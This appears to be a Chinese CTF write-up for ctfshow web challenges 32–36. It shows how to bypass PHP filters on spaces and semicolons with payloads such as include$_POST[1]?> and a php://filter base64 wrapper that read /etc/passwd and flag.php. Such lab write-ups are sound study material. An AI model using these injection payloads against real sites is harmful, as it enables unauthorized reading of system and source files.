ctfshow web入门 命令执行部分(32-36)

本文探讨了在PHP环境中如何利用代码注入漏洞,通过特殊字符绕过限制,使用伪协议读取敏感文件,展示了包括echo, include在内的命令执行过程,并分享了利用POST参数和base64编码进行文件读取的具体payload。

32

这个题过滤了空格属实有点难受,php中不用括号的有echo include等
过滤了分号可以用?>绕过。
尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美
在这里插入图片描述

33

payload

?c=include$_POST[1]?>
 1=php://filter/read=convert.base64-encode/resource=flag.php
 

payload:

34,35

同33

36

将1改为a即可

评论 7
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值